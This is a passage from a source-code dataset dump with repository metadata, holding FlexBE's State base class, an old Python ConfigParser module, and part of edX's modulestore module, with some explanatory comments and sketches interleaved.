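assert db.tables['shop_country'] == ['id', 'name']
```

This symmetry is what lets a migration framework roll the schema back to any earlier state by replaying backwards() methods in reverse order.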
| bsd-3-clause |
team-vigir/flexbe_behavior_engine | flexbe_core/src/flexbe_core/core/state.py | 1 | 1722 | #!/usr/bin/env python
from flexbe_core.core.exceptions import StateError
def _remove_duplicates(input_list):
output_list = list()
for entry in input_list:
if entry not in output_list:
output_list.append(entry)
return output_list
class State(object):
def __init__(self, *args, **kwargs):
self._outcomes = _remove_duplicates(kwargs.get('outcomes', []))
io_keys = kwargs.get('io_keys', [])
self._input_keys = _remove_duplicates(kwargs.get('input_keys', []) + io_keys)
self._output_keys = _remove_duplicates(kwargs.get('output_keys', []) + io_keys)
# properties of instances of a state machine
self._name = None
self._parent = None
def execute(self, userdata):
pass
def sleep(self):
pass
@property
def sleep_duration(self):
return 0.
@property
def outcomes(self):
return self._outcomes
@property
def input_keys(self):
return self._input_keys
@property
def output_keys(self):
return self._output_keys
# instance properties
@property
def name(self):
return self._name
def set_name(self, value):
if self._name is not None:
raise StateError("Cannot change the name of a state!")
else:
self._name = value
@property
def parent(self):
return self._parent
def set_parent(self, value):
if self._parent is not None:
raise StateError("Cannot change the parent of a state!")
else:
self._parent = value
@property
def path(self):
return "" if self.parent is None else self.parent.path + "/" + self.name
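_remove_duplicates() above keeps the first occurrence of each entry and preserves list order, which a plain set() would not. A standalone copy to illustrate the behaviour (the sample outcome list is invented):

```python
def remove_duplicates(input_list):
    # First occurrence wins; relative order is preserved.
    output_list = []
    for entry in input_list:
        if entry not in output_list:
            output_list.append(entry)
    return output_list

outcomes = ['done', 'failed', 'done', 'retry', 'failed']
assert remove_duplicates(outcomes) == ['done', 'failed', 'retry']
```

Order matters here because a state's outcomes are positional in the state machine definition; deduplicating through set() would scramble them.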
| bsd-3-clause |
robovm/robovm-studio | python/lib/Lib/ConfigParser.py | 105 | 23116 | """Configuration file parser.
A setup file consists of sections, led by a "[section]" header,
and followed by "name: value" entries, with continuations and such in
the style of RFC 822.
The option values can contain format strings which refer to other values in
the same section, or values in a special [DEFAULT] section.
For example:
something: %(dir)s/whatever
would resolve the "%(dir)s" to the value of dir. All reference
expansions are done late, on demand.
Intrinsic defaults can be specified by passing them into the
ConfigParser constructor as a dictionary.
class:
ConfigParser -- responsible for parsing a list of
configuration files, and managing the parsed database.
methods:
__init__(defaults=None)
create the parser and specify a dictionary of intrinsic defaults. The
keys must be strings, the values must be appropriate for %()s string
interpolation. Note that `__name__' is always an intrinsic default;
its value is the section's name.
sections()
return all the configuration section names, sans DEFAULT
has_section(section)
return whether the given section exists
has_option(section, option)
return whether the given option exists in the given section
options(section)
return list of configuration options for the named section
read(filenames)
read and parse the list of named configuration files, given by
name. A single filename is also allowed. Non-existing files
are ignored. Return list of successfully read files.
readfp(fp, filename=None)
read and parse one configuration file, given as a file object.
The filename defaults to fp.name; it is only used in error
messages (if fp has no `name' attribute, the string `<???>' is used).
get(section, option, raw=False, vars=None)
return a string value for the named option. All % interpolations are
expanded in the return values, based on the defaults passed into the
constructor and the DEFAULT section. Additional substitutions may be
provided using the `vars' argument, which must be a dictionary whose
contents override any pre-existing defaults.
getint(section, options)
like get(), but convert value to an integer
getfloat(section, options)
like get(), but convert value to a float
getboolean(section, options)
like get(), but convert value to a boolean (currently case
insensitively defined as 0, false, no, off for False, and 1, true,
yes, on for True). Returns False or True.
items(section, raw=False, vars=None)
return a list of tuples with (name, value) for each option
in the section.
remove_section(section)
remove the given file section and all its options
remove_option(section, option)
remove the given option from the given section
set(section, option, value)
set the given option
write(fp)
write the configuration state in .ini format
"""
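The "%(dir)s" expansion described above can be exercised directly. Under Python 3 this module is named configparser, but the interpolation semantics shown are the ones this docstring documents; the section and option names below are illustrative:

```python
import configparser

text = """
[DEFAULT]
dir = /tmp

[paths]
something = %(dir)s/whatever
"""

config = configparser.ConfigParser()
config.read_string(text)

# Expansion is done late, on demand, pulling 'dir' from [DEFAULT]:
assert config.get('paths', 'something') == '/tmp/whatever'

# raw=True returns the unexpanded format string instead:
assert config.get('paths', 'something', raw=True) == '%(dir)s/whatever'
```

Because expansion is deferred until get(), changing a [DEFAULT] value later changes every value that references it.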
import re
__all__ = ["NoSectionError", "DuplicateSectionError", "NoOptionError",
"InterpolationError", "InterpolationDepthError",
"InterpolationSyntaxError", "ParsingError",
"MissingSectionHeaderError",
"ConfigParser", "SafeConfigParser", "RawConfigParser",
"DEFAULTSECT", "MAX_INTERPOLATION_DEPTH"]
DEFAULTSECT = "DEFAULT"
MAX_INTERPOLATION_DEPTH = 10
# exception classes
class Error(Exception):
"""Base class for ConfigParser exceptions."""
def __init__(self, msg=''):
self.message = msg
Exception.__init__(self, msg)
def __repr__(self):
return self.message
__str__ = __repr__
class NoSectionError(Error):
"""Raised when no section matches a requested option."""
def __init__(self, section):
Error.__init__(self, 'No section: %r' % (section,))
self.section = section
class DuplicateSectionError(Error):
"""Raised when a section is multiply-created."""
def __init__(self, section):
Error.__init__(self, "Section %r already exists" % section)
self.section = section
class NoOptionError(Error):
"""A requested option was not found."""
def __init__(self, option, section):
Error.__init__(self, "No option %r in section: %r" %
(option, section))
self.option = option
self.section = section
class InterpolationError(Error):
"""Base class for interpolation-related exceptions."""
def __init__(self, option, section, msg):
Error.__init__(self, msg)
self.option = option
self.section = section
class InterpolationMissingOptionError(InterpolationError):
"""A string substitution required a setting which was not available."""
def __init__(self, option, section, rawval, reference):
msg = ("Bad value substitution:\n"
"\tsection: [%s]\n"
"\toption : %s\n"
"\tkey : %s\n"
"\trawval : %s\n"
% (section, option, reference, rawval))
InterpolationError.__init__(self, option, section, msg)
self.reference = reference
class InterpolationSyntaxError(InterpolationError):
"""Raised when the source text into which substitutions are made
does not conform to the required syntax."""
class InterpolationDepthError(InterpolationError):
"""Raised when substitutions are nested too deeply."""
def __init__(self, option, section, rawval):
msg = ("Value interpolation too deeply recursive:\n"
"\tsection: [%s]\n"
"\toption : %s\n"
"\trawval : %s\n"
% (section, option, rawval))
InterpolationError.__init__(self, option, section, msg)
class ParsingError(Error):
"""Raised when a configuration file does not follow legal syntax."""
def __init__(self, filename):
Error.__init__(self, 'File contains parsing errors: %s' % filename)
self.filename = filename
self.errors = []
def append(self, lineno, line):
self.errors.append((lineno, line))
self.message += '\n\t[line %2d]: %s' % (lineno, line)
class MissingSectionHeaderError(ParsingError):
"""Raised when a key-value pair is found before any section header."""
def __init__(self, filename, lineno, line):
Error.__init__(
self,
'File contains no section headers.\nfile: %s, line: %d\n%r' %
(filename, lineno, line))
self.filename = filename
self.lineno = lineno
self.line = line
class RawConfigParser:
def __init__(self, defaults=None):
self._sections = {}
self._defaults = {}
if defaults:
for key, value in defaults.items():
self._defaults[self.optionxform(key)] = value
def defaults(self):
return self._defaults
def sections(self):
"""Return a list of section names, excluding [DEFAULT]"""
# self._sections will never have [DEFAULT] in it
return self._sections.keys()
def add_section(self, section):
"""Create a new section in the configuration.
Raise DuplicateSectionError if a section by the specified name
already exists.
"""
if section in self._sections:
raise DuplicateSectionError(section)
self._sections[section] = {}
def has_section(self, section):
"""Indicate whether the named section is present in the configuration.
The DEFAULT section is not acknowledged.
"""
return section in self._sections
def options(self, section):
"""Return a list of option names for the given section name."""
try:
opts = self._sections[section].copy()
except KeyError:
raise NoSectionError(section)
opts.update(self._defaults)
if '__name__' in opts:
del opts['__name__']
return opts.keys()
def read(self, filenames):
"""Read and parse a filename or a list of filenames.
Files that cannot be opened are silently ignored; this is
designed so that you can specify a list of potential
configuration file locations (e.g. current directory, user's
home directory, systemwide directory), and all existing
configuration files in the list will be read. A single
filename may also be given.
Return list of successfully read files.
"""
if isinstance(filenames, basestring):
filenames = [filenames]
read_ok = []
for filename in filenames:
try:
fp = open(filename)
except IOError:
continue
self._read(fp, filename)
fp.close()
read_ok.append(filename)
return read_ok
def readfp(self, fp, filename=None):
"""Like read() but the argument must be a file-like object.
The `fp' argument must have a `readline' method. Optional
second argument is the `filename', which if not given, is
taken from fp.name. If fp has no `name' attribute, `<???>' is
used.
"""
if filename is None:
try:
filename = fp.name
except AttributeError:
filename = '<???>'
self._read(fp, filename)
def get(self, section, option):
opt = self.optionxform(option)
if section not in self._sections:
if section != DEFAULTSECT:
raise NoSectionError(section)
if opt in self._defaults:
return self._defaults[opt]
else:
raise NoOptionError(option, section)
elif opt in self._sections[section]:
return self._sections[section][opt]
elif opt in self._defaults:
return self._defaults[opt]
else:
raise NoOptionError(option, section)
def items(self, section):
try:
d2 = self._sections[section]
except KeyError:
if section != DEFAULTSECT:
raise NoSectionError(section)
d2 = {}
d = self._defaults.copy()
d.update(d2)
if "__name__" in d:
del d["__name__"]
return d.items()
def _get(self, section, conv, option):
return conv(self.get(section, option))
def getint(self, section, option):
return self._get(section, int, option)
def getfloat(self, section, option):
return self._get(section, float, option)
_boolean_states = {'1': True, 'yes': True, 'true': True, 'on': True,
'0': False, 'no': False, 'false': False, 'off': False}
def getboolean(self, section, option):
v = self.get(section, option)
if v.lower() not in self._boolean_states:
raise ValueError, 'Not a boolean: %s' % v
return self._boolean_states[v.lower()]
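The boolean-state table used by `getboolean()` above can be exercised with a small standalone sketch (Python 3; the `to_boolean` name is illustrative, not part of this module):

```python
# Minimal sketch of the getboolean() logic: a case-insensitive lookup
# table maps common truthy/falsy spellings to real booleans and
# rejects anything unrecognized.
_BOOLEAN_STATES = {'1': True, 'yes': True, 'true': True, 'on': True,
                   '0': False, 'no': False, 'false': False, 'off': False}

def to_boolean(value):
    """Convert a config string to bool, mirroring getboolean()."""
    v = value.lower()
    if v not in _BOOLEAN_STATES:
        raise ValueError('Not a boolean: %s' % value)
    return _BOOLEAN_STATES[v]
```
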
def optionxform(self, optionstr):
return optionstr.lower()
def has_option(self, section, option):
"""Check for the existence of a given option in a given section."""
if not section or section == DEFAULTSECT:
option = self.optionxform(option)
return option in self._defaults
elif section not in self._sections:
return False
else:
option = self.optionxform(option)
return (option in self._sections[section]
or option in self._defaults)
def set(self, section, option, value):
"""Set an option."""
if not section or section == DEFAULTSECT:
sectdict = self._defaults
else:
try:
sectdict = self._sections[section]
except KeyError:
raise NoSectionError(section)
sectdict[self.optionxform(option)] = value
def write(self, fp):
"""Write an .ini-format representation of the configuration state."""
if self._defaults:
fp.write("[%s]\n" % DEFAULTSECT)
for (key, value) in self._defaults.items():
fp.write("%s = %s\n" % (key, str(value).replace('\n', '\n\t')))
fp.write("\n")
for section in self._sections:
fp.write("[%s]\n" % section)
for (key, value) in self._sections[section].items():
if key != "__name__":
fp.write("%s = %s\n" %
(key, str(value).replace('\n', '\n\t')))
fp.write("\n")
def remove_option(self, section, option):
"""Remove an option."""
if not section or section == DEFAULTSECT:
sectdict = self._defaults
else:
try:
sectdict = self._sections[section]
except KeyError:
raise NoSectionError(section)
option = self.optionxform(option)
existed = option in sectdict
if existed:
del sectdict[option]
return existed
def remove_section(self, section):
"""Remove a file section."""
existed = section in self._sections
if existed:
del self._sections[section]
return existed
#
# Regular expressions for parsing section headers and options.
#
SECTCRE = re.compile(
r'\[' # [
r'(?P<header>[^]]+)' # very permissive!
r'\]' # ]
)
OPTCRE = re.compile(
r'(?P<option>[^:=\s][^:=]*)' # very permissive!
r'\s*(?P<vi>[:=])\s*' # any number of space/tab,
# followed by separator
# (either : or =), followed
# by any # space/tab
r'(?P<value>.*)$' # everything up to eol
)
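The two patterns above can be checked against sample lines with a standalone sketch (Python 3; the patterns are copied from `SECTCRE`/`OPTCRE`, the variable names are illustrative):

```python
import re

# Same section-header and option patterns as SECTCRE/OPTCRE above.
SECT = re.compile(r'\[(?P<header>[^]]+)\]')
OPT = re.compile(r'(?P<option>[^:=\s][^:=]*)\s*(?P<vi>[:=])\s*(?P<value>.*)$')

# A section header captures everything between the brackets.
header = SECT.match('[server]').group('header')

# An option line splits into name, separator, and value; note the
# greedy option group keeps trailing spaces, which is why _read()
# calls rstrip() on the name.
option = OPT.match('port = 8080')
```
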
def _read(self, fp, fpname):
"""Parse a sectioned setup file.
Each section of the setup file contains a title line at the top,
indicated by a name in square brackets (`[]'), plus key/value
option lines, indicated by `name: value' format lines.
Continuations are represented by an embedded newline then
leading whitespace. Blank lines, lines beginning with a '#',
and just about everything else are ignored.
"""
cursect = None # None, or a dictionary
optname = None
lineno = 0
e = None # None, or an exception
while True:
line = fp.readline()
if not line:
break
lineno = lineno + 1
# comment or blank line?
if line.strip() == '' or line[0] in '#;':
continue
if line.split(None, 1)[0].lower() == 'rem' and line[0] in "rR":
# no leading whitespace
continue
# continuation line?
if line[0].isspace() and cursect is not None and optname:
value = line.strip()
if value:
cursect[optname] = "%s\n%s" % (cursect[optname], value)
# a section header or option header?
else:
# is it a section header?
mo = self.SECTCRE.match(line)
if mo:
sectname = mo.group('header')
if sectname in self._sections:
cursect = self._sections[sectname]
elif sectname == DEFAULTSECT:
cursect = self._defaults
else:
cursect = {'__name__': sectname}
self._sections[sectname] = cursect
# So sections can't start with a continuation line
optname = None
# no section header in the file?
elif cursect is None:
raise MissingSectionHeaderError(fpname, lineno, line)
# an option line?
else:
mo = self.OPTCRE.match(line)
if mo:
optname, vi, optval = mo.group('option', 'vi', 'value')
if vi in ('=', ':') and ';' in optval:
# ';' is a comment delimiter only if it follows
# a spacing character
pos = optval.find(';')
if pos != -1 and optval[pos-1].isspace():
optval = optval[:pos]
optval = optval.strip()
# allow empty values
if optval == '""':
optval = ''
optname = self.optionxform(optname.rstrip())
cursect[optname] = optval
else:
# a non-fatal parsing error occurred. set up the
# exception but keep going. the exception will be
# raised at the end of the file and will contain a
# list of all bogus lines
if not e:
e = ParsingError(fpname)
e.append(lineno, repr(line))
# if any parsing errors occurred, raise an exception
if e:
raise e
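The continuation-line rule in `_read()` above (an indented line extends the previous option's value with an embedded newline) can be sketched standalone (Python 3; `parse_simple` is illustrative and skips sections, comments, and error handling):

```python
def parse_simple(lines):
    """Tiny sketch of _read()'s continuation handling: a line that
    starts with whitespace is appended to the previous option's value
    with a newline; other lines are parsed as 'name = value'."""
    options = {}
    optname = None
    for line in lines:
        if line[:1].isspace() and optname:
            options[optname] = options[optname] + '\n' + line.strip()
        elif '=' in line:
            optname, _, value = line.partition('=')
            optname = optname.strip().lower()
            options[optname] = value.strip()
    return options
```
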
class ConfigParser(RawConfigParser):
def get(self, section, option, raw=False, vars=None):
"""Get an option value for a given section.
All % interpolations are expanded in the return values, based on the
defaults passed into the constructor, unless the optional argument
`raw' is true. Additional substitutions may be provided using the
`vars' argument, which must be a dictionary whose contents override
any pre-existing defaults.
The section DEFAULT is special.
"""
d = self._defaults.copy()
try:
d.update(self._sections[section])
except KeyError:
if section != DEFAULTSECT:
raise NoSectionError(section)
# Update with the entry specific variables
if vars:
for key, value in vars.items():
d[self.optionxform(key)] = value
option = self.optionxform(option)
try:
value = d[option]
except KeyError:
raise NoOptionError(option, section)
if raw:
return value
else:
return self._interpolate(section, option, value, d)
def items(self, section, raw=False, vars=None):
"""Return a list of tuples with (name, value) for each option
in the section.
All % interpolations are expanded in the return values, based on the
defaults passed into the constructor, unless the optional argument
`raw' is true. Additional substitutions may be provided using the
`vars' argument, which must be a dictionary whose contents override
any pre-existing defaults.
The section DEFAULT is special.
"""
d = self._defaults.copy()
try:
d.update(self._sections[section])
except KeyError:
if section != DEFAULTSECT:
raise NoSectionError(section)
# Update with the entry specific variables
if vars:
for key, value in vars.items():
d[self.optionxform(key)] = value
options = d.keys()
if "__name__" in options:
options.remove("__name__")
if raw:
return [(option, d[option])
for option in options]
else:
return [(option, self._interpolate(section, option, d[option], d))
for option in options]
def _interpolate(self, section, option, rawval, vars):
# do the string interpolation
value = rawval
depth = MAX_INTERPOLATION_DEPTH
while depth: # Loop through this until it's done
depth -= 1
if "%(" in value:
value = self._KEYCRE.sub(self._interpolation_replace, value)
try:
value = value % vars
except KeyError, e:
raise InterpolationMissingOptionError(
option, section, rawval, e[0])
else:
break
if "%(" in value:
raise InterpolationDepthError(option, section, rawval)
return value
_KEYCRE = re.compile(r"%\(([^)]*)\)s|.")
def _interpolation_replace(self, match):
s = match.group(1)
if s is None:
return match.group()
else:
return "%%(%s)s" % self.optionxform(s)
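The bounded interpolation loop in `_interpolate()` above can be sketched standalone (Python 3; `interpolate` and `MAX_DEPTH` are illustrative names, and the missing-key error handling is omitted):

```python
MAX_DEPTH = 10

def interpolate(value, mapping):
    """Sketch of ConfigParser._interpolate(): repeatedly expand
    %(name)s references via %-formatting, for at most MAX_DEPTH
    passes; leftover references after that mean the nesting is
    too deep."""
    depth = MAX_DEPTH
    while depth:
        depth -= 1
        if "%(" in value:
            value = value % mapping
        else:
            break
    if "%(" in value:
        raise ValueError('interpolation too deeply recursive')
    return value
```

One pass expands one level of reference, so a value that points at another interpolated value resolves on the second pass, while a self-referential value exhausts the depth budget and raises.
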
class SafeConfigParser(ConfigParser):
def _interpolate(self, section, option, rawval, vars):
# do the string interpolation
L = []
self._interpolate_some(option, L, rawval, section, vars, 1)
return ''.join(L)
_interpvar_match = re.compile(r"%\(([^)]+)\)s").match
def _interpolate_some(self, option, accum, rest, section, map, depth):
if depth > MAX_INTERPOLATION_DEPTH:
raise InterpolationDepthError(option, section, rest)
while rest:
p = rest.find("%")
if p < 0:
accum.append(rest)
return
if p > 0:
accum.append(rest[:p])
rest = rest[p:]
# p is no longer used
c = rest[1:2]
if c == "%":
accum.append("%")
rest = rest[2:]
elif c == "(":
m = self._interpvar_match(rest)
if m is None:
raise InterpolationSyntaxError(option, section,
"bad interpolation variable reference %r" % rest)
var = self.optionxform(m.group(1))
rest = rest[m.end():]
try:
v = map[var]
except KeyError:
raise InterpolationMissingOptionError(
option, section, rest, var)
if "%" in v:
self._interpolate_some(option, accum, v,
section, map, depth + 1)
else:
accum.append(v)
else:
raise InterpolationSyntaxError(
option, section,
"'%%' must be followed by '%%' or '(', found: %r" % (rest,))
def set(self, section, option, value):
"""Set an option. Extend ConfigParser.set: check for string values."""
if not isinstance(value, basestring):
raise TypeError("option values must be strings")
ConfigParser.set(self, section, option, value)
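The left-to-right scanner in `_interpolate_some()` above (`%%` escapes a literal `%`, `%(name)s` pulls from the map, recursion handles nested references) can be sketched standalone (Python 3; names are illustrative and all error cases are collapsed to `ValueError`):

```python
import re

_INTERP = re.compile(r"%\(([^)]+)\)s")

def safe_interpolate(rest, mapping, depth=1, max_depth=10):
    """Sketch of SafeConfigParser._interpolate_some(): scan left to
    right, copying literal text, turning '%%' into '%', and expanding
    '%(name)s' from the mapping, recursing when the expansion itself
    contains a '%'."""
    if depth > max_depth:
        raise ValueError('interpolation too deep')
    out = []
    while rest:
        p = rest.find('%')
        if p < 0:
            out.append(rest)
            break
        out.append(rest[:p])
        rest = rest[p:]
        c = rest[1:2]
        if c == '%':
            out.append('%')
            rest = rest[2:]
        elif c == '(':
            m = _INTERP.match(rest)
            if m is None:
                raise ValueError('bad interpolation reference: %r' % rest)
            v = mapping[m.group(1).lower()]
            rest = rest[m.end():]
            if '%' in v:
                out.append(safe_interpolate(v, mapping, depth + 1))
            else:
                out.append(v)
        else:
            raise ValueError("'%' must be followed by '%' or '('")
    return ''.join(out)
```
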
| apache-2.0 |
rhndg/openedx | common/lib/xmodule/xmodule/modulestore/__init__.py | 6 | 54191 | """
This module provides an abstraction for working with XModuleDescriptors
that are stored in a database and accessible using their Location as an identifier
"""
import logging
import re
import json
import datetime
from uuid import uuid4
from pytz import UTC
from collections import namedtuple, defaultdict
import collections
from contextlib import contextmanager
import functools
import threading
from operator import itemgetter
from sortedcontainers import SortedListWithKey
from abc import ABCMeta, abstractmethod
from contracts import contract, new_contract
from xblock.plugin import default_select
from .exceptions import InvalidLocationError, InsufficientSpecificationError
from xmodule.errortracker import make_error_tracker
from xmodule.assetstore import AssetMetadata
from opaque_keys.edx.keys import CourseKey, UsageKey, AssetKey
from opaque_keys.edx.locations import Location # For import backwards compatibility
from opaque_keys import InvalidKeyError
from opaque_keys.edx.locations import SlashSeparatedCourseKey
from xblock.runtime import Mixologist
from xblock.core import XBlock
log = logging.getLogger('edx.modulestore')
new_contract('CourseKey', CourseKey)
new_contract('AssetKey', AssetKey)
new_contract('AssetMetadata', AssetMetadata)
new_contract('XBlock', XBlock)
LIBRARY_ROOT = 'library.xml'
COURSE_ROOT = 'course.xml'
class ModuleStoreEnum(object):
"""
A class to encapsulate common constants that are used with the various modulestores.
"""
class Type(object):
"""
The various types of modulestores provided
"""
split = 'split'
mongo = 'mongo'
xml = 'xml'
class RevisionOption(object):
"""
Revision constants to use for Module Store operations
Note: These values are passed into store APIs and only used at run time
"""
# both DRAFT and PUBLISHED versions are queried, with preference to DRAFT versions
draft_preferred = 'rev-opt-draft-preferred'
# only DRAFT versions are queried and no PUBLISHED versions
draft_only = 'rev-opt-draft-only'
# only PUBLISHED versions are queried and no DRAFT versions
published_only = 'rev-opt-published-only'
# all revisions are queried
all = 'rev-opt-all'
class Branch(object):
"""
Branch constants to use for stores, such as Mongo, that have only 2 branches: DRAFT and PUBLISHED
Note: These values are taken from server configuration settings, so should not be changed without alerting DevOps
"""
draft_preferred = 'draft-preferred'
published_only = 'published-only'
class BranchName(object):
"""
Branch constants to use for stores, such as Split, that have named branches
"""
draft = 'draft-branch'
published = 'published-branch'
library = 'library'
class UserID(object):
"""
Values for user ID defaults
"""
# Note: we use negative values here to (try to) not collide
# with user identifiers provided by actual user services.
# user ID to use for all management commands
mgmt_command = -1
# user ID to use for primitive commands
primitive_command = -2
# user ID to use for tests that do not have a django user available
test = -3
class SortOrder(object):
"""
Values for sorting asset metadata.
"""
ascending = 1
descending = 2
class BulkOpsRecord(object):
"""
For handling nesting of bulk operations
"""
def __init__(self):
self._active_count = 0
self.has_publish_item = False
self.has_library_updated_item = False
@property
def active(self):
"""
Return whether this bulk write is active.
"""
return self._active_count > 0
def nest(self):
"""
Record another level of nesting of this bulk write operation
"""
self._active_count += 1
def unnest(self):
"""
Record the completion of a level of nesting of the bulk write operation
"""
self._active_count -= 1
@property
def is_root(self):
"""
Return whether the bulk write is at the root (first) level of nesting
"""
return self._active_count == 1
class ActiveBulkThread(threading.local):
"""
Add the expected vars to the thread.
"""
def __init__(self, bulk_ops_record_type, **kwargs):
super(ActiveBulkThread, self).__init__(**kwargs)
self.records = defaultdict(bulk_ops_record_type)
class BulkOperationsMixin(object):
"""
This implements the :meth:`bulk_operations` modulestore semantics which handles nested invocations
In particular, it implements :meth:`_begin_bulk_operation` and
:meth:`_end_bulk_operation` to provide the external interface
Internally, this mixin records the set of all active bulk operations (keyed on the active course),
and only writes those values when :meth:`_end_bulk_operation` is called.
If a bulk write operation isn't active, then the changes are immediately written to the underlying
mongo_connection.
"""
def __init__(self, *args, **kwargs):
super(BulkOperationsMixin, self).__init__(*args, **kwargs)
self._active_bulk_ops = ActiveBulkThread(self._bulk_ops_record_type)
@contextmanager
def bulk_operations(self, course_id, emit_signals=True):
"""
A context manager for notifying the store of bulk operations. This affects only the current thread.
In the case of Mongo, it temporarily disables refreshing the metadata inheritance tree
until the bulk operation is completed.
"""
try:
self._begin_bulk_operation(course_id)
yield
finally:
self._end_bulk_operation(course_id, emit_signals)
# the relevant type of bulk_ops_record for the mixin (overriding classes should override
# this variable)
_bulk_ops_record_type = BulkOpsRecord
def _get_bulk_ops_record(self, course_key, ignore_case=False):
"""
Return the :class:`.BulkOpsRecord` for this course.
"""
if course_key is None:
return self._bulk_ops_record_type()
# Retrieve the bulk record based on matching org/course/run (possibly ignoring case)
if ignore_case:
for key, record in self._active_bulk_ops.records.iteritems():
# Shortcut: check basic equivalence for cases where org/course/run might be None.
if key == course_key or (
key.org.lower() == course_key.org.lower() and
key.course.lower() == course_key.course.lower() and
key.run.lower() == course_key.run.lower()
):
return record
return self._active_bulk_ops.records[course_key.for_branch(None)]
@property
def _active_records(self):
"""
Yield all active (CourseLocator, BulkOpsRecord) tuples.
"""
for course_key, record in self._active_bulk_ops.records.iteritems():
if record.active:
yield (course_key, record)
def _clear_bulk_ops_record(self, course_key):
"""
Clear the record for this course
"""
del self._active_bulk_ops.records[course_key.for_branch(None)]
def _start_outermost_bulk_operation(self, bulk_ops_record, course_key):
"""
The outermost nested bulk_operation call: do the actual begin of the bulk operation.
Implementing classes must override this method; otherwise, the bulk operations are a noop
"""
pass
def _begin_bulk_operation(self, course_key):
"""
Begin a bulk operation on course_key.
"""
bulk_ops_record = self._get_bulk_ops_record(course_key)
# Increment the number of active bulk operations (bulk operations
# on the same course can be nested)
bulk_ops_record.nest()
# If this is the highest level bulk operation, then initialize it
if bulk_ops_record.is_root:
self._start_outermost_bulk_operation(bulk_ops_record, course_key)
def _end_outermost_bulk_operation(self, bulk_ops_record, structure_key, emit_signals=True):
"""
The outermost nested bulk_operation call: do the actual end of the bulk operation.
Implementing classes must override this method; otherwise, the bulk operations are a noop
"""
pass
def _end_bulk_operation(self, structure_key, emit_signals=True):
"""
End the active bulk operation on structure_key (course or library key).
"""
# If no bulk op is active, return
bulk_ops_record = self._get_bulk_ops_record(structure_key)
if not bulk_ops_record.active:
return
bulk_ops_record.unnest()
# If this wasn't the outermost context, then don't close out the
# bulk operation.
if bulk_ops_record.active:
return
self._end_outermost_bulk_operation(bulk_ops_record, structure_key, emit_signals)
self._clear_bulk_ops_record(structure_key)
def _is_in_bulk_operation(self, course_key, ignore_case=False):
"""
Return whether a bulk operation is active on `course_key`.
"""
return self._get_bulk_ops_record(course_key, ignore_case).active
def send_bulk_published_signal(self, bulk_ops_record, course_id):
"""
Sends out the signal that items have been published from within this course.
"""
signal_handler = getattr(self, 'signal_handler', None)
if signal_handler and bulk_ops_record.has_publish_item:
signal_handler.send("course_published", course_key=course_id)
bulk_ops_record.has_publish_item = False
def send_bulk_library_updated_signal(self, bulk_ops_record, library_id):
"""
Sends out the signal that a library has been updated.
"""
signal_handler = getattr(self, 'signal_handler', None)
if signal_handler and bulk_ops_record.has_library_updated_item:
signal_handler.send("library_updated", library_key=library_id)
bulk_ops_record.has_library_updated_item = False
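The nesting protocol implemented by `BulkOpsRecord` and `bulk_operations()` above reduces to a counter where only the outermost context triggers real begin/end work. A standalone sketch (Python 3; `BulkCounter` and its `events` log are illustrative):

```python
from contextlib import contextmanager

class BulkCounter:
    """Sketch of the BulkOperationsMixin nesting protocol: entering a
    nested bulk_operations() context just increments a counter, and
    only the outermost enter/exit performs the real begin/end work."""
    def __init__(self):
        self.count = 0
        self.events = []

    @contextmanager
    def bulk_operations(self):
        self.count += 1
        if self.count == 1:          # outermost: real begin
            self.events.append('begin')
        try:
            yield
        finally:
            self.count -= 1
            if self.count == 0:      # outermost: real end
                self.events.append('end')
```

However deeply the contexts nest, exactly one begin and one end are recorded, which is what lets callers wrap already-bulk-aware code without double-committing.
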
class EditInfo(object):
"""
Encapsulates the editing info of a block.
"""
def __init__(self, **kwargs):
self.from_storable(kwargs)
# For details, see caching_descriptor_system.py get_subtree_edited_by/on.
self._subtree_edited_on = kwargs.get('_subtree_edited_on', None)
self._subtree_edited_by = kwargs.get('_subtree_edited_by', None)
def to_storable(self):
"""
Serialize to a Mongo-storable format.
"""
return {
'previous_version': self.previous_version,
'update_version': self.update_version,
'source_version': self.source_version,
'edited_on': self.edited_on,
'edited_by': self.edited_by,
'original_usage': self.original_usage,
'original_usage_version': self.original_usage_version,
}
def from_storable(self, edit_info):
"""
De-serialize from Mongo-storable format to an object.
"""
# Guid for the structure which previously changed this XBlock.
# (Will be the previous value of 'update_version'.)
self.previous_version = edit_info.get('previous_version', None)
# Guid for the structure where this XBlock got its current field values.
# May point to a structure not in this structure's history (e.g., to a draft
# branch from which this version was published).
self.update_version = edit_info.get('update_version', None)
self.source_version = edit_info.get('source_version', None)
# Datetime when this XBlock's fields last changed.
self.edited_on = edit_info.get('edited_on', None)
# User ID which changed this XBlock last.
self.edited_by = edit_info.get('edited_by', None)
# If this block has been copied from a library using copy_from_template,
# these fields point to the original block in the library, for analytics.
self.original_usage = edit_info.get('original_usage', None)
self.original_usage_version = edit_info.get('original_usage_version', None)
def __repr__(self):
# pylint: disable=bad-continuation, redundant-keyword-arg
return ("{classname}(previous_version={self.previous_version}, "
"update_version={self.update_version}, "
"source_version={source_version}, "
"edited_on={self.edited_on}, "
"edited_by={self.edited_by}, "
"original_usage={self.original_usage}, "
"original_usage_version={self.original_usage_version}, "
"_subtree_edited_on={self._subtree_edited_on}, "
"_subtree_edited_by={self._subtree_edited_by})").format(
self=self,
classname=self.__class__.__name__,
source_version="UNSET" if self.source_version is None else self.source_version,
) # pylint: disable=bad-continuation
class BlockData(object):
"""
Wrap the block data in an object instead of using a straight Python dictionary.
Allows the storing of meta-information about a structure that doesn't persist along with
the structure itself.
"""
def __init__(self, **kwargs):
# Has the definition been loaded?
self.definition_loaded = False
self.from_storable(kwargs)
def to_storable(self):
"""
Serialize to a Mongo-storable format.
"""
return {
'fields': self.fields,
'block_type': self.block_type,
'definition': self.definition,
'defaults': self.defaults,
'edit_info': self.edit_info.to_storable()
}
def from_storable(self, block_data):
"""
De-serialize from Mongo-storable format to an object.
"""
# Contains the Scope.settings and 'children' field values.
# 'children' are stored as a list of (block_type, block_id) pairs.
self.fields = block_data.get('fields', {})
# XBlock type ID.
self.block_type = block_data.get('block_type', None)
# DB id of the record containing the content of this XBlock.
self.definition = block_data.get('definition', None)
# Scope.settings default values copied from a template block (used e.g. when
# blocks are copied from a library to a course)
self.defaults = block_data.get('defaults', {})
# EditInfo object containing all versioning/editing data.
self.edit_info = EditInfo(**block_data.get('edit_info', {}))
def __repr__(self):
# pylint: disable=bad-continuation, redundant-keyword-arg
return ("{classname}(fields={self.fields}, "
"block_type={self.block_type}, "
"definition={self.definition}, "
"definition_loaded={self.definition_loaded}, "
"defaults={self.defaults}, "
"edit_info={self.edit_info})").format(
self=self,
classname=self.__class__.__name__,
